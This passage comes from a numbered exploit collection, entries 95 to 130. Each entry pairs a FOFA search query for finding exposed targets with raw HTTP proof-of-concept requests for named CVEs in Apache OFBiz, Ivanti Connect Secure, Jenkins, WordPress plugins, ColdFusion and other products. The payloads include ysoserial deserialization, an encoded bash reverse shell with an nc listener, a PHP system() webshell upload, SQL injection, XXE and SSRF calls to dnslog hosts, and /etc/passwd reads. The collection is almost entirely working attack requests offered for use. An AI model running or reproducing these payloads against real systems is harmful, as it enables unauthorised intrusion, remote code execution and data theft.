FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of an XML document, which is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
  "topicurl": "getSysStatusCfg",
  "token": ""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-Type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Response:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
First log in to the system; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform: arbitrary file upload via userattestation.php
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform: SQL injection in /importexport.php
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system: arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
